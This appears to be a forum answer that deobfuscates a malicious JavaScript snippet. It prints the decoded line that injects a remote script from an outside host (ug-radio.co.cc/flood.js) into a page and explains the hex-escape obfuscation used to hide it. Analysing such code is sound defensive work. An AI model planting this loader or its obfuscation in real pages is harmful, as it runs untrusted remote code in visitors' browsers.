The author used various methods of "obfuscation", i.e. various methods to make the code visually confusing and difficult to understand.
_0x8dd5 is an array of strings:
['src', 'script', 'createElement', 'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']
The rest of the code uses the property names from the lines above, so the non-obfuscated code is actually
a = document.createElement('script'); a.src = 'http://ug-radio.co.cc/flood.js'; document.body.appendChild(a);
Therefore, all that the author did to obfuscate the code was links to all property names as strings from an array. An array containing strings simply uses the hexadecimal identification of the escape code \xNN , which makes it less obvious as to what strings are.
The author does this by finding the hexadecimal values ββof the bytes that form the strings in the current encoding. Then for each byte in the lines it adds \xNN , where NN is the value of the hexadecimal byte. When the JavaScript interpreter runs the script, the parser automatically replaces these screens with the appropriate characters.
source share